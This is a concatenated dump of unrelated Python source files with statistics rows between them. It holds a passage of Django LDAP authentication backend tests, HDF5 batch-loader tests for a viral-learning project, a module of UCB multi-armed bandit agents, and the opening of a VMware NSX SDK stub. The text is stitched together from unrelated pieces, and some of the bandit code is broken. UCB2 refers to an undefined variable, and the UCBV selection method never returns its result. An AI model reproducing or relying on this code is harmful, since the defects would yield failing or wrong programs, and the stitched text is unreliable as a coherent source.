GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
FIND_GROUP_PERMS=True,
AUTHORIZE_ALL_USERS=True,
)
self._init_groups()
backend = get_backend()
alice = User.objects.create(username="not-in-ldap")
self.assertEqual(backend.get_group_permissions(alice), set())
def test_mapping_authorize_external_unknown(self):
self._init_settings(
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
),
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
FIND_GROUP_PERMS=True,
AUTHORIZE_ALL_USERS=True,
USE_GROUP_MAPPING=True,
)
self._init_groups_with_mapping()
backend = get_backend()
alice = User.objects.create(username="not-in-ldap")
self.assertEqual(backend.get_group_permissions(alice), set())
def test_create_without_auth(self):
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
backend = get_backend()
alice = backend.populate_user("alice")
bob = backend.populate_user("bob")
self.assertIsNotNone(alice)
self.assertEqual(alice.first_name, "")
self.assertEqual(alice.last_name, "")
self.assertIs(alice.is_active, True)
self.assertIs(alice.is_staff, False)
self.assertIs(alice.is_superuser, False)
self.assertIsNotNone(bob)
self.assertEqual(bob.first_name, "")
self.assertEqual(bob.last_name, "")
self.assertIs(bob.is_active, True)
self.assertIs(bob.is_staff, False)
self.assertIs(bob.is_superuser, False)
def test_populate_without_auth(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
ALWAYS_UPDATE_USER=False,
USER_ATTR_MAP={"first_name": "givenName", "last_name": "sn"},
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=GroupOfNamesType(),
USER_FLAGS_BY_GROUP={
"is_active": "cn=active_gon,ou=groups,o=test",
"is_staff": "cn=staff_gon,ou=groups,o=test",
"is_superuser": "cn=superuser_gon,ou=groups,o=test",
},
)
User.objects.create(username="alice")
User.objects.create(username="bob")
backend = get_backend()
alice = backend.populate_user("alice")
bob = backend.populate_user("bob")
self.assertIsNotNone(alice)
self.assertEqual(alice.first_name, "Alice")
self.assertEqual(alice.last_name, "Adams")
self.assertIs(alice.is_active, True)
self.assertIs(alice.is_staff, True)
self.assertIs(alice.is_superuser, True)
self.assertIsNotNone(bob)
self.assertEqual(bob.first_name, "Robert")
self.assertEqual(bob.last_name, "Barker")
self.assertIs(bob.is_active, False)
self.assertIs(bob.is_staff, False)
self.assertIs(bob.is_superuser, False)
def test_populate_bogus_user(self):
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
backend = get_backend()
bogus = backend.populate_user("bogus")
self.assertIsNone(bogus)
@spy_ldap("start_tls_s")
def test_start_tls_missing(self, mock):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test", START_TLS=False
)
authenticate(username="alice", password="password")
mock.assert_not_called()
@spy_ldap("start_tls_s")
def test_start_tls(self, mock):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test", START_TLS=True
)
authenticate(username="alice", password="password")
mock.assert_called_once()
def test_null_search_results(self):
"""
Make sure we're not phased by referrals.
"""
self._init_settings(
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
)
)
authenticate(username="alice", password="password")
def test_union_search(self):
self._init_settings(
USER_SEARCH=LDAPSearchUnion(
LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"),
LDAPSearch("ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"),
)
)
alice = authenticate(username="alice", password="password")
self.assertIsNotNone(alice)
@spy_ldap("simple_bind_s")
def test_deny_empty_password(self, mock):
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
alice = authenticate(username="alice", password="")
self.assertIsNone(alice)
mock.assert_not_called()
@spy_ldap("simple_bind_s")
def test_permit_empty_password(self, mock):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test", PERMIT_EMPTY_PASSWORD=True
)
alice = authenticate(username="alice", password="")
self.assertIsNone(alice)
mock.assert_called_once()
@spy_ldap("simple_bind_s")
def test_permit_null_password(self, mock):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test", PERMIT_EMPTY_PASSWORD=True
)
alice = authenticate(username="alice", password=None)
self.assertIsNone(alice)
mock.assert_called_once()
def test_pickle(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
FIND_GROUP_PERMS=True,
)
self._init_groups()
backend = get_backend()
alice0 = authenticate(username="alice", password="password")
pickled = pickle.dumps(alice0, pickle.HIGHEST_PROTOCOL)
alice = pickle.loads(pickled)
self.assertIsNotNone(alice)
self.assertEqual(
backend.get_group_permissions(alice), {"auth.add_user", "auth.change_user"}
)
self.assertEqual(
backend.get_all_permissions(alice), {"auth.add_user", "auth.change_user"}
)
self.assertIs(backend.has_perm(alice, "auth.add_user"), True)
self.assertIs(backend.has_module_perms(alice, "auth"), True)
def test_mapping_pickle(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
FIND_GROUP_PERMS=True,
USE_GROUP_MAPPING=True
)
self._init_groups_with_mapping()
backend = get_backend()
alice0 = authenticate(username="alice", password="password")
pickled = pickle.dumps(alice0, pickle.HIGHEST_PROTOCOL)
alice = pickle.loads(pickled)
self.assertIsNotNone(alice)
self.assertEqual(
backend.get_group_permissions(alice), {"auth.add_group", "auth.delete_user"}
)
self.assertEqual(
backend.get_all_permissions(alice), {"auth.add_group", "auth.delete_user"}
)
self.assertIs(backend.has_perm(alice, "auth.delete_user"), True)
self.assertIs(backend.has_module_perms(alice, "auth"), True)
@mock.patch("ldap.ldapobject.SimpleLDAPObject.search_s")
def test_search_attrlist(self, mock_search):
backend = get_backend()
connection = backend.ldap.initialize(self.server.ldap_uri, bytes_mode=False)
search = LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=alice)", ["*", "+"]
)
search.execute(connection)
mock_search.assert_called_once_with(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=alice)", ["*", "+"]
)
def test_override_authenticate_access_ldap_user(self):
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
class MyBackend(LDAPBackend):
def authenticate_ldap_user(self, ldap_user, password):
ldap_user.foo = "bar"
return super().authenticate_ldap_user(ldap_user, password)
backend = MyBackend()
user = backend.authenticate(None, username="alice", password="password")
self.assertEqual(user.ldap_user.foo, "bar")
@spy_ldap("search_s")
def test_dn_not_cached(self, mock):
self._init_settings(
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
)
)
for _ in range(2):
user = authenticate(username="alice", password="password")
self.assertIsNotNone(user)
# Should have executed once per auth.
self.assertEqual(mock.call_count, 2)
# DN is not cached.
self.assertIsNone(cache.get("cool_django_auth_ldap.user_dn.alice"))
@spy_ldap("search_s")
def test_dn_cached(self, mock):
self._init_settings(
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
),
CACHE_TIMEOUT=60,
)
for _ in range(2):
user = authenticate(username="alice", password="password")
self.assertIsNotNone(user)
# Should have executed only once.
self.assertEqual(mock.call_count, 1)
# DN is cached.
self.assertEqual(
cache.get("cool_django_auth_ldap.user_dn.alice"), "uid=alice,ou=people,o=test"
)
def test_deprecated_cache_groups(self):
self._init_settings(
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
),
CACHE_GROUPS=True,
)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
user = authenticate(username="alice", password="password")
self.assertIsNotNone(user)
self.assertEqual(len(w), 1)
self.assertEqual(w[0].category, DeprecationWarning)
self.assertEqual(
str(w[0].message),
"Found deprecated setting AUTH_LDAP_CACHE_GROUP. Use "
"AUTH_LDAP_CACHE_TIMEOUT instead.",
)
# DN is cached.
self.assertEqual(
cache.get("cool_django_auth_ldap.user_dn.alice"), "uid=alice,ou=people,o=test"
)
#
# Utilities
#
def _init_settings(self, **kwargs):
kwargs.setdefault("SERVER_URI", self.server.ldap_uri)
settings = {}
for key, value in kwargs.items():
settings["AUTH_LDAP_%s" % key] = value
cm = override_settings(**settings)
cm.enable()
self.addCleanup(cm.disable)
def _init_groups(self):
permissions = [
Permission.objects.get(codename="add_user"),
Permission.objects.get(codename="change_user"),
]
active_gon = Group.objects.create(name="active_gon")
active_gon.permissions.add(*permissions)
active_px = Group.objects.create(name="active_px")
active_px.permissions.add(*permissions)
active_nis = Group.objects.create(name="active_nis")
active_nis.permissions.add(*permissions)
def _init_groups_with_mapping(self):
permissions = [
Permission.objects.get(codename="add_group"),
Permission.objects.get(codename="delete_user"),
]
active_gon = Group.objects.create(name="django_active_gon")
active_gon.permissions.add(*permissions)
active_px = Group.objects.create(name="django_active_px")
active_px.permissions.add(*permissions)
active_nis = Group.objects.create(name="django_active_nis")
active_nis.permissions.add(*permissions)
GroupMapping.objects.create(django_group=active_gon, ldap_group_name="active_gon")
GroupMapping.objects.create(django_group=active_px, ldap_group_name="active_px")
GroupMapping.objects.create(django_group=active_nis, ldap_group_name="active_nis")
| 37.00476
| 122
| 0.618866
| 8,743
| 77,747
| 5.263411
| 0.061306
| 0.023252
| 0.023665
| 0.034182
| 0.847212
| 0.815203
| 0.795211
| 0.769025
| 0.757704
| 0.737668
| 0
| 0.00248
| 0.258492
| 77,747
| 2,100
| 123
| 37.022381
| 0.79575
| 0.031873
| 0
| 0.646639
| 0
| 0
| 0.160907
| 0.072637
| 0
| 0
| 0
| 0
| 0.155265
| 1
| 0.07674
| false
| 0.070791
| 0.012493
| 0.00119
| 0.098156
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
22f569ff73204966052ebdd3b28a02a28d34d1f8
| 8,626
|
py
|
Python
|
vl/test/test_data.py
|
hurwitzlab/viral-learning
|
8d7aebc0d58fa32a429f4a47593452ee2722ba82
|
[
"MIT"
] | 1
|
2018-02-23T16:49:30.000Z
|
2018-02-23T16:49:30.000Z
|
vl/test/test_data.py
|
hurwitzlab/viral-learning
|
8d7aebc0d58fa32a429f4a47593452ee2722ba82
|
[
"MIT"
] | null | null | null |
vl/test/test_data.py
|
hurwitzlab/viral-learning
|
8d7aebc0d58fa32a429f4a47593452ee2722ba82
|
[
"MIT"
] | null | null | null |
import h5py
import numpy as np
from vl.data import load_kmer_random_batches_h5, load_kmer_range_batches_h5
def test_load_kmer_range_batches_h5():
with h5py.File('unit_test.h5', 'w') as test_data:
dset1_shape = (12, 2)
dset1 = test_data.create_dataset('/test/data1', dset1_shape, dtype=np.float64)
dset1_array = np.arange(np.product(dset1_shape)).reshape(dset1_shape)
dset1[:, :] = dset1_array
# dset1 looks like this:
# [[0. 1.]
# [2. 3.]
# [4. 5.]
# [6. 7.]
# [8. 9.]
# [10. 11.]
# [12. 13.]
# [14. 15.]
# [16. 17.]
# [18. 19.]
# [20. 21.]
# [22. 23.]]
dset2_shape = (10, 2)
dset2 = test_data.create_dataset('/test/data2', dset2_shape, dtype=np.float64)
dset2_array = np.arange(np.product(dset2_shape)).reshape(dset2_shape) + np.product(dset2_shape)
dset2[:, :] = dset2_array
# dset2 looks like this:
# [[20. 21.]
# [22. 23.]
# [24. 25.]
# [26. 27.]
# [28. 29.]
# [30. 31.]
# [32. 33.]
# [34. 35.]
# [36. 37.]
# [38. 39.]]
with h5py.File('unit_test.h5', 'r') as test_data:
dset1 = test_data['/test/data1']
dset2 = test_data['/test/data2']
gen1 = load_kmer_range_batches_h5(
name='gen1',
bacteria_dset=dset1,
virus_dset=dset2,
bacteria_range=(0, dset1_shape[0]),
virus_range=(0, dset2.shape[0]),
half_batch_size=5,
shuffle_batch=False)
batch1, labels1 = gen1.__next__()
batch2, labels2 = gen1.__next__()
batch3, labels3 = gen1.__next__()
assert np.all(batch1 == np.vstack((dset1_array[:5, :], dset2_array[:5, :])))
assert np.all(labels1 == [[0], [0], [0], [0], [0], [1], [1], [1], [1], [1]])
assert np.all(batch2 == np.vstack((dset1_array[5:10, :], dset2_array[5:10, :])))
assert np.all(labels2 == [[0], [0], [0], [0], [0], [1], [1], [1], [1], [1]])
assert np.all(batch3 == np.vstack((dset1_array[:5, :], dset2_array[:5, :])))
assert np.all(labels3 == [[0], [0], [0], [0], [0], [1], [1], [1], [1], [1]])
np.random.seed(1)
gen2 = load_kmer_range_batches_h5(
name='gen2',
bacteria_dset=dset1,
virus_dset=dset2,
bacteria_range=(0, dset1_shape[0]),
virus_range=(0, dset2.shape[0]),
half_batch_size=5,
shuffle_batch=True)
batch1, labels1 = gen2.__next__()
batch2, labels2 = gen2.__next__()
batch3, labels3 = gen2.__next__()
assert batch1.shape == (10, 2)
assert np.all(batch1 == np.vstack((
dset1_array[2, :],
dset2_array[4, :],
dset2_array[1, :],
dset1_array[4, :],
dset1_array[0, :],
dset1_array[3, :],
dset1_array[1, :],
dset2_array[2, :],
dset2_array[3, :],
dset2_array[0, :])))
assert labels1.shape == (10, 1)
assert np.all(labels1 == [[0], [1], [1], [0], [0], [0], [0], [1] ,[1] ,[1]])
assert batch2.shape == (10, 2)
assert np.all(batch2 == np.vstack((
dset2_array[9, :],
dset2_array[5, :],
dset1_array[8, :],
dset1_array[5, :],
dset2_array[8, :],
dset1_array[9, :],
dset1_array[7, :],
dset1_array[6, :],
dset2_array[6, :],
dset2_array[7, :])))
assert labels2.shape == (10, 1)
assert np.all(labels2 == [[1], [1], [0], [0], [1], [0], [0], [0] ,[1] ,[1]])
assert batch3.shape == (10, 2)
assert np.all(batch3 == np.vstack((
dset2_array[3, :],
dset1_array[3, :],
dset2_array[0, :],
dset2_array[4, :],
dset1_array[0, :],
dset2_array[1, :],
dset1_array[1, :],
dset2_array[2, :],
dset1_array[4, :],
dset1_array[2, :])))
assert labels3.shape == (10, 1)
assert np.all(labels3 == [[1], [0], [1], [1], [0], [1], [0], [1] ,[0] ,[0]])
def test_load_kmer_random_batches_h5():
with h5py.File('unit_test.h5', 'w') as test_data:
dset1_shape = (12, 2)
dset1 = test_data.create_dataset('/test/data1', dset1_shape, dtype=np.float64)
dset1_array = np.arange(np.product(dset1_shape)).reshape(dset1_shape)
dset1[:, :] = dset1_array
# dset1 looks like this:
# [[0. 1.]
# [2. 3.]
# [4. 5.]
# [6. 7.]
# [8. 9.]
# [10. 11.]
# [12. 13.]
# [14. 15.]
# [16. 17.]
# [18. 19.]
# [20. 21.]
# [22. 23.]]
dset2_shape = (10, 2)
dset2 = test_data.create_dataset('/test/data2', dset2_shape, dtype=np.float64)
dset2_array = np.arange(np.product(dset2_shape)).reshape(dset2_shape) + np.product(dset2_shape)
dset2[:, :] = dset2_array
# dset2 looks like this:
# [[20. 21.]
# [22. 23.]
# [24. 25.]
# [26. 27.]
# [28. 29.]
# [30. 31.]
# [32. 33.]
# [34. 35.]
# [36. 37.]
# [38. 39.]]
with h5py.File('unit_test.h5', 'r') as test_data:
dset1 = test_data['/test/data1']
dset2 = test_data['/test/data2']
gen1 = load_kmer_random_batches_h5(
name='gen1',
bacteria_dset=dset1,
virus_dset=dset2,
bacteria_subsample=np.arange(dset1.shape[0]),
virus_subsample=np.arange(dset2.shape[0]),
half_batch_size=5,
shuffle_batch=False)
batch1, labels1 = gen1.__next__()
batch2, labels2 = gen1.__next__()
batch3, labels3 = gen1.__next__()
print(batch2)
assert np.all(batch1 == np.vstack((dset1_array[:5, :], dset2_array[:5, :])))
assert np.all(labels1 == [[0], [0], [0], [0], [0], [1], [1], [1], [1], [1]])
assert np.all(batch2 == np.vstack((dset1_array[5:10, :], dset2_array[5:10, :])))
assert np.all(labels2 == [[0], [0], [0], [0], [0], [1], [1], [1], [1], [1]])
assert np.all(batch3 == np.vstack((dset1_array[:5, :], dset2_array[:5, :])))
assert np.all(labels3 == [[0], [0], [0], [0], [0], [1], [1], [1], [1], [1]])
np.random.seed(1)
gen2 = load_kmer_random_batches_h5(
name='gen2',
bacteria_dset=dset1,
virus_dset=dset2,
bacteria_subsample=np.arange(dset1_shape[0]),
virus_subsample=np.arange(dset2.shape[0]),
half_batch_size=5,
shuffle_batch=True)
batch1, labels1 = gen2.__next__()
batch2, labels2 = gen2.__next__()
batch3, labels3 = gen2.__next__()
assert batch1.shape == (10, 2)
assert np.all(batch1 == np.vstack((
dset1_array[2, :],
dset2_array[4, :],
dset2_array[1, :],
dset1_array[4, :],
dset1_array[0, :],
dset1_array[3, :],
dset1_array[1, :],
dset2_array[2, :],
dset2_array[3, :],
dset2_array[0, :])))
assert labels1.shape == (10, 1)
assert np.all(labels1 == [[0], [1], [1], [0], [0], [0], [0], [1] ,[1] ,[1]])
assert batch2.shape == (10, 2)
assert np.all(batch2 == np.vstack((
dset2_array[9, :],
dset2_array[5, :],
dset1_array[8, :],
dset1_array[5, :],
dset2_array[8, :],
dset1_array[9, :],
dset1_array[7, :],
dset1_array[6, :],
dset2_array[6, :],
dset2_array[7, :])))
assert labels2.shape == (10, 1)
assert np.all(labels2 == [[1], [1], [0], [0], [1], [0], [0], [0] ,[1] ,[1]])
assert batch3.shape == (10, 2)
assert np.all(batch3 == np.vstack((
dset2_array[3, :],
dset1_array[3, :],
dset2_array[0, :],
dset2_array[4, :],
dset1_array[0, :],
dset2_array[1, :],
dset1_array[1, :],
dset2_array[2, :],
dset1_array[4, :],
dset1_array[2, :])))
assert labels3.shape == (10, 1)
assert np.all(labels3 == [[1], [0], [1], [1], [0], [1], [0], [1] ,[0] ,[0]])
| 33.564202
| 103
| 0.465221
| 1,040
| 8,626
| 3.636538
| 0.098077
| 0.105764
| 0.069804
| 0.014807
| 0.982549
| 0.963511
| 0.957694
| 0.957694
| 0.957694
| 0.957694
| 0
| 0.118253
| 0.34709
| 8,626
| 256
| 104
| 33.695313
| 0.553267
| 0.076165
| 0
| 0.930233
| 0
| 0
| 0.019697
| 0
| 0
| 0
| 0
| 0
| 0.209302
| 1
| 0.011628
| false
| 0
| 0.017442
| 0
| 0.02907
| 0.005814
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a3a803915854109d3925e5378843f1a0d0f44cad
| 10,111
|
py
|
Python
|
mablane/algortims/_UCB.py
|
analyticslane/mablane
|
237dd5bbeb40ba9a175a65d0327e57e29e0438d0
|
[
"MIT"
] | null | null | null |
mablane/algortims/_UCB.py
|
analyticslane/mablane
|
237dd5bbeb40ba9a175a65d0327e57e29e0438d0
|
[
"MIT"
] | null | null | null |
mablane/algortims/_UCB.py
|
analyticslane/mablane
|
237dd5bbeb40ba9a175a65d0327e57e29e0438d0
|
[
"MIT"
] | null | null | null |
import numpy as np
from ._Epsilon import Epsilon
class UCB1(Epsilon):
"""
Agente que soluciona el problema del el Bandido Multibrazo
(Multi-Armed Bandit) mediante el uso de una estrategia UCB1
Parámetros
----------
bandits : array of Bandit
Vector con los bandidos con los que se debe jugar
Métodos
-------
run :
Realiza una serie de tiradas con los bandidos seleccionados
por el algoritmo
update:
Actualiza los valores adicionales después de una tirada
select :
Selecciona un bandido para jugar en la próxima tirada
average_reward :
Obtención de la recompensa promedio
plot :
Representación gráfica del histórico de tiradas
References
----------
Giuseppe Burtini, Jason Loeppky, and Ramon Lawrence. "A survey of online
experiment design with the stochastic multi-armed bandit." arXiv preprint
arXiv:1510.00757 (2015).
"""
def select(self):
total = len(self._rewards)
if total < self._num_bandits:
bandit = total
else:
ucb = [0] * self._num_bandits
for i in range(self._num_bandits):
ucb[i] = self._mean[i] + np.sqrt(2 * np.log(total) / self._plays[i])
max_bandits = np.where(ucb == np.max(ucb))[0]
bandit = np.random.choice(max_bandits)
return bandit
class UCB2(Epsilon):
"""
Agente que soluciona el problema del el Bandido Multibrazo
(Multi-Armed Bandit) mediante el uso de una estrategia UCB2
Parámetros
----------
bandits : array of Bandit
Vector con los bandidos con los que se debe jugar
alpha : float
Parámetro que se influye en el ratio de aprendizaje del algoritmo
Métodos
-------
run :
Realiza una serie de tiradas con los bandidos seleccionados
por el algoritmo
update:
Actualiza los valores adicionales después de una tirada
select :
Selecciona un bandido para jugar en la próxima tirada
average_reward :
Obtención de la recompensa promedio
plot :
Representación gráfica del histórico de tiradas
References
----------
Giuseppe Burtini, Jason Loeppky, and Ramon Lawrence. "A survey of online
experiment design with the stochastic multi-armed bandit." arXiv preprint
arXiv:1510.00757 (2015).
"""
def __init__(self, bandits, alpha=0.1):
self.alpha = alpha
self._mean = [0] * len(bandits)
super(UCB2, self).__init__(bandits)
def select(self):
total = len(self._rewards)
if total == 0:
bandit = np.random.choice(self._num_bandits)
else:
ucb = [0] * num_bandits
for i in range(num_bandits):
try:
tau = int(np.ceil((1 + self.alpha) ** self._plays[i]))
if np.log(np.e * total / tau) > 0:
bonus = np.sqrt((1. + self.alpha) * np.log(np.e * total / tau) / (2 * tau))
else:
bonus = 0
except:
bonus = 0
if np.isnan(bonus):
ucb[i] = self._mean[i]
else:
ucb[i] = self._mean[i] + bonus
max_bandits = np.where(ucb == np.max(ucb))[0]
bandit = np.random.choice(max_bandits)
return bandit
class UCB1Tuned(Epsilon):
"""
Agente que soluciona el problema del el Bandido Multibrazo
(Multi-Armed Bandit) mediante el uso de una estrategia UCB1-Tuned
Parámetros
----------
bandits : array of Bandit
Vector con los bandidos con los que se debe jugar
Métodos
-------
run :
Realiza una serie de tiradas con los bandidos seleccionados
por el algoritmo
update:
Actualiza los valores adicionales después de una tirada
select :
Selecciona un bandido para jugar en la próxima tirada
average_reward :
Obtención de la recompensa promedio
plot :
Representación gráfica del histórico de tiradas
References
----------
Giuseppe Burtini, Jason Loeppky, and Ramon Lawrence. "A survey of online
experiment design with the stochastic multi-armed bandit." arXiv preprint
arXiv:1510.00757 (2015).
"""
def __init__(self, bandits):
self._mean2 = [0] * len(bandits)
super(UCB1Tuned, self).__init__(bandits)
def update(self, bandit, reward):
# Actualización de la media de los cuadrados
self._mean2[bandit] = (1 - 1.0/self._plays[bandit]) * self._mean2[bandit] \
+ 1.0/self._plays[bandit] * reward ** 2
def select(self):
total = len(self._rewards)
if total == 0:
bandit = np.random.choice(self._num_bandits)
else:
ucb = [0] * self._num_bandits
for i in range(self._num_bandits):
if self._plays[i] == 0:
v = self._mean2[i] - self._mean[i] ** 2 + np.sqrt(2 * np.log(total))
else:
v = self._mean2[i] - self._mean[i] ** 2 + np.sqrt(2 * np.log(total) / self._plays[i])
ucb[i] = self._mean[i] + np.sqrt(np.log(total) * np.min([1/4, v]))
max_bandits = np.where(ucb == np.max(ucb))[0]
bandit = np.random.choice(max_bandits)
return bandit
class UCBNormal(Epsilon):
"""
Agente que soluciona el problema del el Bandido Multibrazo
(Multi-Armed Bandit) mediante el uso de una estrategia UCB-Normal
Parámetros
----------
bandits : array of Bandit
Vector con los bandidos con los que se debe jugar
Métodos
-------
run :
Realiza una serie de tiradas con los bandidos seleccionados
por el algoritmo
update:
Actualiza los valores adicionales después de una tirada
select :
Selecciona un bandido para jugar en la próxima tirada
average_reward :
Obtención de la recompensa promedio
plot :
Representación gráfica del histórico de tiradas
References
----------
Giuseppe Burtini, Jason Loeppky, and Ramon Lawrence. "A survey of online
experiment design with the stochastic multi-armed bandit." arXiv preprint
arXiv:1510.00757 (2015).
"""
def __init__(self, bandits):
self._rewards2 = [0] * len(bandits)
super(UCBNormal, self).__init__(bandits)
def update(self, bandit, reward):
self._rewards2[bandit] += reward ** 2
def select(self):
total = len(self._rewards)
# Número de veces mínimo que debe jugar cada bandido
if total > 0:
min_plays = np.ceil(8 * np.log(total))
else:
min_plays = 1
# En caso de que algún bandido no jugase el mínimo de veces se selecciona ese
if np.any(np.array(self._plays) < min_plays):
min_bandit = np.where(np.array(self._plays) < min_plays)[0]
bandit = np.random.choice(min_bandit)
else:
ucb = [0] * self._num_bandits
for i in range(self._num_bandits):
if self._plays[i] > 1:
bonus = 16 * (self._rewards2[i] - self._plays[i] * self._mean[i]**2) / (self._plays[i] - 1)
bonus *= np.log(total - 1) / self._plays[i]
bonus = np.sqrt(bonus)
ucb[i] = self._mean[i] + bonus
else:
ucb[i] = self._mean[i]
max_bandits = np.where(ucb == np.max(ucb))[0]
bandit = np.random.choice(max_bandits)
return bandit
class UCBV(Epsilon):
"""
Agente que soluciona el problema del el Bandido Multibrazo
(Multi-Armed Bandit) mediante el uso de una estrategia UCBV
Parámetros
----------
bandits : array of Bandit
Vector con los bandidos con los que se debe jugar
b : float
Hiperparámetro para seleccionar el ration de aprendizaje
Métodos
-------
run :
Realiza una serie de tiradas con los bandidos seleccionados
por el algoritmo
update:
Actualiza los valores adicionales después de una tirada
select :
Selecciona un bandido para jugar en la próxima tirada
average_reward :
Obtención de la recompensa promedio
plot :
Representación gráfica del histórico de tiradas
References
----------
Jean Yves Audibert, Rémi Munos, and Csaba Szepesvári.
"Exploration-exploitation trade-off using variance estimates in multi-armed
bandits." Theoretical Computer Science, Volume 410, Issue 19, 28 April 2009,
Pages 1876-1902 (https://doi.org/10.1016/j.tcs.2009.01.016)
"""
def __init__(self, bandits, b=3):
self.b = b
self._mean2 = [0] * len(bandits)
super(UCBV, self).__init__(bandits)
def update(self, bandit, reward):
self._mean2[bandit] += reward**2
def select(self):
num_bandits = len(self.bandits)
total = len(self._rewards)
if total < num_bandits:
bandit = total
else:
ucb = [0] * num_bandits
for i in range(num_bandits):
var = self._mean2[i] / self._plays[i] - self._mean[i]**2
ucb[i] = self._mean[i]
ucb[i] += np.sqrt(2 * var * np.log(total) / self._plays[i])
ucb[i] += self.b * np.log(total) / self._plays[i]
max_bandits = np.where(ucb == np.max(ucb))[0]
bandit = np.random.choice(max_bandits)
| 31.303406
| 111
| 0.557709
| 1,203
| 10,111
| 4.586866
| 0.162095
| 0.01631
| 0.017941
| 0.019935
| 0.810982
| 0.795759
| 0.749184
| 0.737224
| 0.722363
| 0.690286
| 0
| 0.024071
| 0.350806
| 10,111
| 323
| 112
| 31.303406
| 0.816575
| 0.427356
| 0
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.01548
| 0
| 1
| 0.107143
| false
| 0
| 0.017857
| 0
| 0.205357
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4319ba4e0989f9f1415b9a5e9155385b3d646341
| 209,148
|
py
|
Python
|
com/vmware/nsx/fabric_client.py
|
adammillerio/vsphere-automation-sdk-python
|
c07e1be98615201139b26c28db3aa584c4254b66
|
[
"MIT"
] | null | null | null |
com/vmware/nsx/fabric_client.py
|
adammillerio/vsphere-automation-sdk-python
|
c07e1be98615201139b26c28db3aa584c4254b66
|
[
"MIT"
] | null | null | null |
com/vmware/nsx/fabric_client.py
|
adammillerio/vsphere-automation-sdk-python
|
c07e1be98615201139b26c28db3aa584c4254b66
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#---------------------------------------------------------------------------
# Copyright 2020 VMware, Inc. All rights reserved.
# AUTO GENERATED FILE -- DO NOT MODIFY!
#
# vAPI stub file for package com.vmware.nsx.fabric.
#---------------------------------------------------------------------------
"""
"""
__author__ = 'VMware, Inc.'
__docformat__ = 'restructuredtext en'
import sys
from vmware.vapi.bindings import type
from vmware.vapi.bindings.converter import TypeConverter
from vmware.vapi.bindings.enum import Enum
from vmware.vapi.bindings.error import VapiError
from vmware.vapi.bindings.struct import VapiStruct
from vmware.vapi.bindings.stub import (
ApiInterfaceStub, StubFactoryBase, VapiInterface)
from vmware.vapi.bindings.common import raise_core_exception
from vmware.vapi.data.validator import (UnionValidator, HasFieldsOfValidator)
from vmware.vapi.exception import CoreException
from vmware.vapi.lib.constants import TaskType
from vmware.vapi.lib.rest import OperationRestMetadata
class ComputeCollectionFabricTemplates(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.compute_collection_fabric_templates'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ComputeCollectionFabricTemplatesStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
compute_collection_fabric_template,
):
"""
Fabric templates are fabric configurations applied at the compute
collection level. This configurations is used to decide what automated
operations should be a run when a host membership changes.
